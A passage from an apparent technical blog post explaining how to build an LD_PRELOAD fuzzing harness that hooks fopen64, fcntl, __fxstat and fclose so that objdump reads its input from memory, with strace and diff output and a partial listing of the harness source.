<p>The definition for <code class="language-plaintext highlighter-rouge">fopen64()</code> mirrors that of <code class="language-plaintext highlighter-rouge">fopen()</code>: <code class="language-plaintext highlighter-rouge">FILE *fopen(const char *restrict pathname, const char *restrict mode);</code>. The returned <code class="language-plaintext highlighter-rouge">FILE *</code> poses a slight problem to us because this is an opaque data structure that is not meant to be understood by the caller. Which is to say, the caller is not meant to access any members of this data structure or worry about its layout in any way. You’re just supposed to use the returned <code class="language-plaintext highlighter-rouge">FILE *</code> as an object to pass to other functions, such as <code class="language-plaintext highlighter-rouge">fclose()</code>. The system deals with the data structure there in those types of related functions so that programmers don’t have to worry about a specific implementation.</p>

<p>We don’t actually know how the returned <code class="language-plaintext highlighter-rouge">FILE *</code> will be used. It may not be used at all, or it may be passed to a function such as <code class="language-plaintext highlighter-rouge">fread()</code>, so we need a way to return a convincing <code class="language-plaintext highlighter-rouge">FILE *</code> data structure to the caller that is actually built from our input in memory and NOT from the input file. Luckily, there is a libc function called <code class="language-plaintext highlighter-rouge">fmemopen()</code> which behaves very similarly to <code class="language-plaintext highlighter-rouge">fopen()</code> and also returns a <code class="language-plaintext highlighter-rouge">FILE *</code>. So we can go ahead and create a <code class="language-plaintext highlighter-rouge">FILE *</code> to return to callers of <code class="language-plaintext highlighter-rouge">fopen64()</code> with <code class="language-plaintext highlighter-rouge">fuzzme</code> as the target input file. Shoutout to @domenuk for showing me <code class="language-plaintext highlighter-rouge">fmemopen()</code>, I had never come across it before.</p>

<p>There is one key difference though. <code class="language-plaintext highlighter-rouge">fopen()</code> will actually obtain a file descriptor for the underlying file and <code class="language-plaintext highlighter-rouge">fmemopen()</code>, since it is not actually opening a file, will not. So somewhere in the <code class="language-plaintext highlighter-rouge">FILE *</code> data structure, there is a file descriptor for the underlying file if returned from <code class="language-plaintext highlighter-rouge">fopen()</code> and there isn’t one if returned from <code class="language-plaintext highlighter-rouge">fmemopen()</code>. This is very important as functions such as <code class="language-plaintext highlighter-rouge">int fileno(FILE *stream)</code> can parse a <code class="language-plaintext highlighter-rouge">FILE *</code> and return its underlying file descriptor to the caller. Objdump may want to do this for some reason and we need to be able to robustly handle it. So we need a way to know if someone is trying to use our faked <code class="language-plaintext highlighter-rouge">FILE *</code>’s underlying file descriptor.</p>

<p>My idea for this was to simply find the struct member containing the file descriptor in the <code class="language-plaintext highlighter-rouge">FILE *</code> returned from <code class="language-plaintext highlighter-rouge">fmemopen()</code> and change it to be something ridiculous like <code class="language-plaintext highlighter-rouge">1337</code> so that if objdump ever tried to use that file descriptor we would know the source of it and could try to hook any interactions with the file descriptor. So now our <code class="language-plaintext highlighter-rouge">fopen64()</code> hook should look as follows:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Our fopen hook, return a FILE* to the caller, also, if we are opening our</span>
<span class="c1">// target make sure we're not able to write to the file</span>
<span class="kt">FILE</span><span class="o">*</span> <span class="nf">fopen64</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">pathname</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">mode</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Resolve symbol on demand and only once</span>
    <span class="k">if</span> <span class="p">(</span><span class="nb">NULL</span> <span class="o">==</span> <span class="n">real_fopen64</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">real_fopen64</span> <span class="o">=</span> <span class="n">_resolve_symbol</span><span class="p">(</span><span class="s">"fopen64"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Check to see what file we're opening</span>
    <span class="kt">FILE</span><span class="o">*</span> <span class="n">ret</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="n">FUZZ_TARGET</span><span class="p">,</span> <span class="n">pathname</span><span class="p">))</span> <span class="p">{</span>
        <span class="c1">// We're trying to open our file, make sure it's a read-only mode</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">mode</span><span class="p">,</span> <span class="s">"r"</span><span class="p">))</span> <span class="p">{</span>
            <span class="n">printf</span><span class="p">(</span><span class="s">"Attempt to open fuzz-target in illegal mode: '%s'</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">mode</span><span class="p">);</span>
            <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="c1">// Open shared memory FILE* and return to caller</span>
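        <span class="n">ret</span> <span class="o">=</span> <span class="n">fmemopen</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">INPUT_ADDR</span><span class="p">,</span> <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span><span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span><span class="p">,</span> <span class="n">mode</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="nb">NULL</span> <span class="o">==</span> <span class="n">ret</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">printf</span><span class="p">(</span><span class="s">"fmemopen() failed for fuzzing target</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
            <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
        <span class="p">}</span>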
        
        <span class="c1">// Make sure we've never fopen()'d our fuzzing target before</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">faked_fp</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">printf</span><span class="p">(</span><span class="s">"Attempting to fopen64() fuzzing target more than once</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
            <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="c1">// Update faked_fp</span>
        <span class="n">faked_fp</span> <span class="o">=</span> <span class="n">ret</span><span class="p">;</span>

        <span class="c1">// Change the filedes to something we know</span>
        <span class="n">ret</span><span class="o">-&gt;</span><span class="n">_fileno</span> <span class="o">=</span> <span class="mi">1337</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// We're not opening our file, send to regular fopen</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="n">real_fopen64</span><span class="p">(</span><span class="n">pathname</span><span class="p">,</span> <span class="n">mode</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Return FILE stream ptr to caller</span>
    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>You can see we:</p>
<ol>
  <li>Resolve the symbol location if it hasn’t been yet</li>
  <li>Check to see if we’re being called on our fuzzing target input file</li>
  <li>Call <code class="language-plaintext highlighter-rouge">fmemopen()</code> and open the memory buffer where our current input is in memory along with the input’s size</li>
</ol>

<p>You may also notice a few safety checks as well to make sure things don’t go unnoticed. We have a global variable, <code class="language-plaintext highlighter-rouge">FILE *faked_fp</code>, that we initialize to <code class="language-plaintext highlighter-rouge">NULL</code>, which lets us know if we’ve opened our input more than once (it wouldn’t be <code class="language-plaintext highlighter-rouge">NULL</code> anymore on subsequent attempts to open it).</p>

<p>We also do a check on the <code class="language-plaintext highlighter-rouge">mode</code> argument to make sure we’re getting a read-only <code class="language-plaintext highlighter-rouge">FILE *</code> back. We don’t want objdump to alter our input or write to it in any way and if it tries to, we need to know about it.</p>
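<p>As an aside, the exact-match check against <code class="language-plaintext highlighter-rouge">"r"</code> is deliberately strict and would also reject harmless modes like <code class="language-plaintext highlighter-rouge">"rb"</code>. If a target ever used one of those, a slightly more lenient check could look like the sketch below. The helper <code class="language-plaintext highlighter-rouge">mode_is_read_only</code> is hypothetical and is not what the harness in this post uses.</p>

```c
#include <assert.h>
#include <stdbool.h>
#include <string.h>

// Hypothetical helper, not part of the harness: decide whether an fopen()
// mode string grants read access only. Modes begin with 'r', 'w' or 'a',
// and a '+' anywhere in the string adds the other direction.
static bool mode_is_read_only(const char *mode) {
    assert(mode != NULL);
    return mode[0] == 'r' && strchr(mode, '+') == NULL;
}
```

<p>With this, <code class="language-plaintext highlighter-rouge">"r"</code> and <code class="language-plaintext highlighter-rouge">"rb"</code> pass while <code class="language-plaintext highlighter-rouge">"r+"</code>, <code class="language-plaintext highlighter-rouge">"w"</code> and <code class="language-plaintext highlighter-rouge">"a"</code> are refused. Failing loudly on anything unexpected, as the hook above does, is still the safer default while exploring a new target.</p>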

<p>Running our shared object at this point nets us the following output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme
objdump: fuzzme: Bad file descriptor
</code></pre></div></div>

<p>My spidey-sense is telling me something tried to interact with a file descriptor of <code class="language-plaintext highlighter-rouge">1337</code>. Let’s run again under <code class="language-plaintext highlighter-rouge">strace</code> and see what happens.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>h0mbre@ubuntu:~/blogpost$ strace -E LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme &gt; /tmp/output.txt
</code></pre></div></div>

<p>In the output, we can see some syscalls to <code class="language-plaintext highlighter-rouge">fcntl()</code> and <code class="language-plaintext highlighter-rouge">fstat()</code> both being called with a file descriptor of <code class="language-plaintext highlighter-rouge">1337</code> which obviously doesn’t exist in our objdump process, so we’ve been able to find the problem.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>fcntl(1337, F_GETFD)                    = -1 EBADF (Bad file descriptor)
prlimit64(0, RLIMIT_NOFILE, NULL, {rlim_cur=4*1024, rlim_max=4*1024}) = 0
fstat(1337, 0x7fff4bf54c90)             = -1 EBADF (Bad file descriptor)
fstat(1337, 0x7fff4bf54bf0)             = -1 EBADF (Bad file descriptor)
</code></pre></div></div>

<p>As we’ve already learned, there is no direct export in libc for <code class="language-plaintext highlighter-rouge">fstat()</code>, it’s one of those weird ones like <code class="language-plaintext highlighter-rouge">stat()</code> and we actually have to hook <code class="language-plaintext highlighter-rouge">__fxstat()</code>. So let’s try and hook that to see if it gets called for our <code class="language-plaintext highlighter-rouge">1337</code> file descriptor. The hook function will look like this to start:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Declare prototype for the real __fxstat</span>
<span class="k">typedef</span> <span class="nf">int</span> <span class="p">(</span><span class="o">*</span><span class="n">__fxstat_t</span><span class="p">)(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="kt">int</span> <span class="n">__filedesc</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">__stat_buf</span><span class="p">);</span>
<span class="n">__fxstat_t</span> <span class="n">real_fxstat</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="p">...</span>

<span class="c1">// Hook for __fxstat</span>
<span class="kt">int</span> <span class="nf">__fxstat</span> <span class="p">(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="kt">int</span> <span class="n">__filedesc</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">__stat_buf</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"** __fxstat() called for __filedesc: %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">__filedesc</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

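<p>Now we also still have that <code class="language-plaintext highlighter-rouge">fcntl()</code> to deal with. Luckily that hook is straightforward: if someone issues <code class="language-plaintext highlighter-rouge">F_GETFD</code> on that special <code class="language-plaintext highlighter-rouge">1337</code> file descriptor, we’ll simply return <code class="language-plaintext highlighter-rouge">O_RDONLY</code>, and we’ll just panic for now if someone calls it for a different file descriptor. Strictly speaking, <code class="language-plaintext highlighter-rouge">F_GETFD</code> reports the descriptor flags (such as <code class="language-plaintext highlighter-rouge">FD_CLOEXEC</code>) rather than the flags the file was “opened” with, but <code class="language-plaintext highlighter-rouge">O_RDONLY</code> is <code class="language-plaintext highlighter-rouge">0</code>, so the caller simply sees a descriptor with no flags set. The hook answers every command on <code class="language-plaintext highlighter-rouge">1337</code> this way, including <code class="language-plaintext highlighter-rouge">F_SETFD</code>, where <code class="language-plaintext highlighter-rouge">0</code> reads as success. This hook looks like this:</p>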
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Declare prototype for the real __fcntl</span>
<span class="k">typedef</span> <span class="nf">int</span> <span class="p">(</span><span class="o">*</span><span class="n">fcntl_t</span><span class="p">)(</span><span class="kt">int</span> <span class="n">fildes</span><span class="p">,</span> <span class="kt">int</span> <span class="n">cmd</span><span class="p">,</span> <span class="p">...);</span>
<span class="n">fcntl_t</span> <span class="n">real_fcntl</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="p">...</span>

<span class="c1">// Hook for fcntl</span>
<span class="kt">int</span> <span class="nf">fcntl</span><span class="p">(</span><span class="kt">int</span> <span class="n">fildes</span><span class="p">,</span> <span class="kt">int</span> <span class="n">cmd</span><span class="p">,</span> <span class="p">...)</span> <span class="p">{</span>
    <span class="c1">// Resolve fcntl symbol if needed</span>
    <span class="k">if</span> <span class="p">(</span><span class="nb">NULL</span> <span class="o">==</span> <span class="n">real_fcntl</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">real_fcntl</span> <span class="o">=</span> <span class="n">_resolve_symbol</span><span class="p">(</span><span class="s">"fcntl"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">fildes</span> <span class="o">==</span> <span class="mi">1337</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">O_RDONLY</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">else</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"** fcntl() called for real file descriptor</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Running this under <code class="language-plaintext highlighter-rouge">strace</code> now, the <code class="language-plaintext highlighter-rouge">fcntl()</code> call is absent as we would expect:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>openat(AT_FDCWD, "/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=26376, ...}) = 0
mmap(NULL, 26376, PROT_READ, MAP_SHARED, 3, 0) = 0x7ff61d331000
close(3)                                = 0
prlimit64(0, RLIMIT_NOFILE, NULL, {rlim_cur=4*1024, rlim_max=4*1024}) = 0
fstat(1, {st_mode=S_IFREG|0664, st_size=0, ...}) = 0
write(1, "** __fxstat() called for __filed"..., 42) = 42
exit_group(0)                           = ?
+++ exited with 0 +++
</code></pre></div></div>

<p>Now we can flesh out our <code class="language-plaintext highlighter-rouge">__fxstat()</code> hook with some logic. The caller is hoping to retrieve a <code class="language-plaintext highlighter-rouge">stat struct</code> for our fuzzing target <code class="language-plaintext highlighter-rouge">fuzzme</code> by passing the special file descriptor <code class="language-plaintext highlighter-rouge">1337</code>. Luckily, we have our global <code class="language-plaintext highlighter-rouge">stat struct</code> that we can return after we update its size to match that of the current input in memory (as tracked by us and the fuzzer as the value at <code class="language-plaintext highlighter-rouge">INPUT_SZ_ADDR</code>). So if called with that descriptor, we simply update the size in our <code class="language-plaintext highlighter-rouge">stat struct</code> and <code class="language-plaintext highlighter-rouge">memcpy</code> our struct into their <code class="language-plaintext highlighter-rouge">*__stat_buf</code>. Any other descriptor is passed through to the real <code class="language-plaintext highlighter-rouge">__fxstat()</code>. Our complete hook now looks like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Hook for __fxstat</span>
<span class="kt">int</span> <span class="nf">__fxstat</span> <span class="p">(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="kt">int</span> <span class="n">__filedesc</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">__stat_buf</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Resolve the real fxstat</span>
    <span class="k">if</span> <span class="p">(</span><span class="nb">NULL</span> <span class="o">==</span> <span class="n">real_fxstat</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">real_fxstat</span> <span class="o">=</span> <span class="n">_resolve_symbol</span><span class="p">(</span><span class="s">"__fxstat"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>

    <span class="c1">// Check to see if we're stat'ing our fuzz target</span>
    <span class="k">if</span> <span class="p">(</span><span class="mi">1337</span> <span class="o">==</span> <span class="n">__filedesc</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// Patch the global struct with current input size</span>
        <span class="n">st</span><span class="p">.</span><span class="n">st_size</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span><span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span><span class="p">;</span>

        <span class="c1">// Copy global stat struct back to caller</span>
        <span class="n">memcpy</span><span class="p">(</span><span class="n">__stat_buf</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">st</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">stat</span><span class="p">));</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Normal stat, send to real fxstat</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="n">real_fxstat</span><span class="p">(</span><span class="n">__ver</span><span class="p">,</span> <span class="n">__filedesc</span><span class="p">,</span> <span class="n">__stat_buf</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Now if we run this, we actually don’t break and objdump is able to exit cleanly under <code class="language-plaintext highlighter-rouge">strace</code>.</p>

<h2 id="wrapping-up">Wrapping Up</h2>
<p>To test whether or not we have done a fair job, we will output <code class="language-plaintext highlighter-rouge">objdump -D fuzzme</code> to a file, and then run the same command with our harness shared object loaded. Lastly, we’ll run <code class="language-plaintext highlighter-rouge">objdump -D /bin/ed</code> and output to a file to see if our harness produced the same output.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>h0mbre@ubuntu:~/blogpost$ objdump -D fuzzme &gt; /tmp/fuzzme_original.txt      
h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme &gt; /tmp/harness.txt 
h0mbre@ubuntu:~/blogpost$ objdump -D /bin/ed &gt; /tmp/ed.txt
</code></pre></div></div>

<p>Then we <code class="language-plaintext highlighter-rouge">sha1sum</code> the files:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>h0mbre@ubuntu:~/blogpost$ sha1sum /tmp/fuzzme_original.txt /tmp/harness.txt /tmp/ed.txt 
938518c86301ab00ddf6a3ef528d7610fa3fd05a  /tmp/fuzzme_original.txt
add4e6c3c298733f48fbfe143caee79445c2f196  /tmp/harness.txt
10454308b672022b40f6ce5e32a6217612b462c8  /tmp/ed.txt
</code></pre></div></div>

<p>We actually get three different hashes. We wanted the harness run and the <code class="language-plaintext highlighter-rouge">/bin/ed</code> run to produce the same output, since <code class="language-plaintext highlighter-rouge">/bin/ed</code> is the input we loaded into memory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>h0mbre@ubuntu:~/blogpost$ ls -laht /tmp
total 14M
drwxrwxrwt 28 root   root   128K Apr  3 08:44 .
-rw-rw-r--  1 h0mbre h0mbre 736K Apr  3 08:43 ed.txt
-rw-rw-r--  1 h0mbre h0mbre 736K Apr  3 08:43 harness.txt
-rw-rw-r--  1 h0mbre h0mbre 2.2M Apr  3 08:42 fuzzme_original.txt
</code></pre></div></div>

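<p>Ah, <code class="language-plaintext highlighter-rouge">ed.txt</code> and <code class="language-plaintext highlighter-rouge">harness.txt</code> are the same size at least, so the difference must be subtle, and <code class="language-plaintext highlighter-rouge">diff</code> shows us why the hashes aren’t the same:</p>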
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>h0mbre@ubuntu:~/blogpost$ diff /tmp/ed.txt /tmp/harness.txt 
2c2
&lt; /bin/ed:     file format elf64-x86-64
---
&gt; fuzzme:     file format elf64-x86-64
</code></pre></div></div>

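<p>The only difference is the file name that objdump echoes back from its <code class="language-plaintext highlighter-rouge">argv[]</code> array (<code class="language-plaintext highlighter-rouge">fuzzme</code> versus <code class="language-plaintext highlighter-rouge">/bin/ed</code>); the disassembly itself is identical. In the end we were able to feed objdump an input file, but have it actually take input from an in-memory buffer in our harness.</p>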

<p>One more thing: we actually forgot that objdump closes our file, didn’t we! So I went ahead and added a quick <code class="language-plaintext highlighter-rouge">fclose()</code> hook. We wouldn’t have any problems if <code class="language-plaintext highlighter-rouge">fclose()</code> just wanted to free the heap memory associated with the <code class="language-plaintext highlighter-rouge">FILE *</code> returned by <code class="language-plaintext highlighter-rouge">fmemopen()</code>; however, it would also probably try to call <code class="language-plaintext highlighter-rouge">close()</code> on that wonky file descriptor, and we don’t want that. It might not even matter in the end, but I just want to be safe. It’s up to the reader to experiment and see what changes. The imaginary fuzzer should restore the <code class="language-plaintext highlighter-rouge">FILE *</code> heap memory anyway during its snapshot restoration routine.</p>
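
<p>A minimal sketch of what such an <code class="language-plaintext highlighter-rouge">fclose()</code> hook could look like is below. It is only one possible shape, under a few assumptions: it relies on the <code class="language-plaintext highlighter-rouge">faked_fp</code> global that the <code class="language-plaintext highlighter-rouge">fopen64()</code> hook sets, and it resolves the real <code class="language-plaintext highlighter-rouge">fclose()</code> directly with <code class="language-plaintext highlighter-rouge">dlsym()</code> instead of the harness’s <code class="language-plaintext highlighter-rouge">_resolve_symbol()</code> helper so that the snippet stands alone. For our faked stream it reports success and leaves the stream untouched, on the assumption that the snapshot restore resets it anyway:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define _GNU_SOURCE     /* RTLD_NEXT */
#include &lt;stdio.h&gt;      /* FILE, printf */
#include &lt;stdlib.h&gt;     /* exit */
#include &lt;dlfcn.h&gt;      /* dlsym */

// Assumption: the same global the fopen64() hook stores its fmemopen() stream in
FILE *faked_fp = NULL;

// Declare prototype for the real fclose as a function pointer
typedef int (*fclose_t)(FILE *stream);
static fclose_t real_fclose = NULL;

// Hook for fclose
int fclose(FILE *stream) {
    // Resolve the real fclose on demand and only once
    if (NULL == real_fclose) {
        real_fclose = (fclose_t)dlsym(RTLD_NEXT, "fclose");
        if (NULL == real_fclose) {
            printf("** Err resolving 'fclose'\n");
            exit(-1);
        }
    }

    // Our faked stream: report success and never reach the real fclose,
    // so nothing tries to close() the fake file descriptor
    if (NULL != stream &amp;&amp; stream == faked_fp) {
        return 0;
    }

    // Any other stream goes to the real fclose
    return real_fclose(stream);
}
</code></pre></div></div>

<p>Because the faked stream is never really closed, the target can call <code class="language-plaintext highlighter-rouge">fclose()</code> on it as many times as it likes without touching descriptor <code class="language-plaintext highlighter-rouge">1337</code>; every other stream behaves as usual.</p>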

<h2 id="conclusion">Conclusion</h2>
<p>There are a million different ways to accomplish this goal; I just wanted to walk you through my thought process. There are actually a lot of cool things you can do with this harness. One thing I’ve done is hook <code class="language-plaintext highlighter-rouge">malloc()</code> to fail on large allocations so that I don’t waste fuzzing cycles on things that will eventually time out. You can also create an <code class="language-plaintext highlighter-rouge">at_exit()</code> choke point so that, no matter what, the program executes your <code class="language-plaintext highlighter-rouge">at_exit()</code> function every time it exits. This can be useful for snapshot resets if the program can take multiple exit paths, as you only have to cover the one exit point.</p>
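
<p>Here is a rough sketch of both ideas, under a few assumptions. It targets glibc, which exports the real allocator as <code class="language-plaintext highlighter-rouge">__libc_malloc()</code>, so the hook does not need <code class="language-plaintext highlighter-rouge">dlsym()</code>. The 64MB cap (<code class="language-plaintext highlighter-rouge">MAX_ALLOC_SZ</code>) and the names <code class="language-plaintext highlighter-rouge">_exit_choke_point()</code> and <code class="language-plaintext highlighter-rouge">_install_exit_hook()</code> are made up for illustration, and the choke point is registered with the standard <code class="language-plaintext highlighter-rouge">atexit()</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stddef.h&gt;     /* size_t */
#include &lt;stdio.h&gt;      /* printf */
#include &lt;stdlib.h&gt;     /* atexit, exit */
#include &lt;errno.h&gt;      /* errno, ENOMEM */

// Hypothetical cap on a single allocation, tune this for the target
#define MAX_ALLOC_SZ    (64UL * 1024 * 1024)

// glibc-specific assumption: the real allocator is exported under this name
extern void *__libc_malloc(size_t size);

// Hook for malloc, fail oversized requests the same way an exhausted heap would
void *malloc(size_t size) {
    if (size &gt; MAX_ALLOC_SZ) {
        errno = ENOMEM;
        return NULL;
    }

    // Normal allocation, send to the real allocator
    return __libc_malloc(size);
}

// Single exit choke point, a real fuzzer would trigger its snapshot reset here
static void _exit_choke_point(void) {
    printf("** Reached exit choke point\n");
}

// Register the choke point as soon as the shared object is loaded
__attribute__((constructor)) static void _install_exit_hook(void) {
    if (0 != atexit(_exit_choke_point)) {
        printf("** Err registering exit choke point\n");
        exit(-1);
    }
}
</code></pre></div></div>

<p>One caveat with this approach: handlers registered through <code class="language-plaintext highlighter-rouge">atexit()</code> only run when the program calls <code class="language-plaintext highlighter-rouge">exit()</code> or returns from <code class="language-plaintext highlighter-rouge">main()</code>. A target that bails out through <code class="language-plaintext highlighter-rouge">_exit()</code> or <code class="language-plaintext highlighter-rouge">abort()</code> would need those paths hooked separately.</p>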

<p>Hopefully this was useful to some! The complete code to the harness is below, happy fuzzing!</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/</span>

<span class="cp">#define _GNU_SOURCE     </span><span class="cm">/* dlsym */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="c1"> /* printf */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="c1"> /* stat */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="c1"> /* exit */</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="c1"> /* __xstat, __fxstat */</span><span class="cp">
#include</span> <span class="cpf">&lt;dlfcn.h&gt;</span><span class="c1"> /* dlsym and friends */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/mman.h&gt;</span><span class="c1"> /* mmap */</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="c1"> /* memset */</span><span class="cp">
#include</span> <span class="cpf">&lt;fcntl.h&gt;</span><span class="c1"> /* open */</span><span class="cp">
</span>
<span class="c1">// Filename of the input file we're trying to emulate</span>
<span class="cp">#define FUZZ_TARGET     "fuzzme"
</span>
<span class="c1">// Definitions for our in-memory inputs </span>
<span class="cp">#define INPUT_SZ_ADDR   0x1336000
#define INPUT_ADDR      0x1337000
#define MAX_INPUT_SZ    (1024 * 1024)
</span>
<span class="c1">// For testing purposes, we read /bin/ed into our input buffer to simulate</span>
<span class="c1">// what the fuzzer would do</span>
<span class="cp">#define  TEST_FILE      "/bin/ed"
</span>
<span class="c1">// Our "legit" global stat struct</span>
<span class="k">struct</span> <span class="n">stat</span> <span class="n">st</span><span class="p">;</span>

<span class="c1">// FILE * returned to callers of fopen64() </span>
<span class="kt">FILE</span> <span class="o">*</span><span class="n">faked_fp</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// Declare a prototype for the real stat as a function pointer</span>
<span class="k">typedef</span> <span class="nf">int</span> <span class="p">(</span><span class="o">*</span><span class="n">__xstat_t</span><span class="p">)(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">__filename</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">__stat_buf</span><span class="p">);</span>
<span class="n">__xstat_t</span> <span class="n">real_xstat</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// Declare prototype for the real fopen and its friend fopen64 </span>
<span class="k">typedef</span> <span class="kt">FILE</span><span class="o">*</span> <span class="p">(</span><span class="o">*</span><span class="n">fopen_t</span><span class="p">)(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">pathname</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">mode</span><span class="p">);</span>
<span class="n">fopen_t</span> <span class="n">real_fopen</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="k">typedef</span> <span class="kt">FILE</span><span class="o">*</span> <span class="p">(</span><span class="o">*</span><span class="n">fopen64_t</span><span class="p">)(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">pathname</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">mode</span><span class="p">);</span>
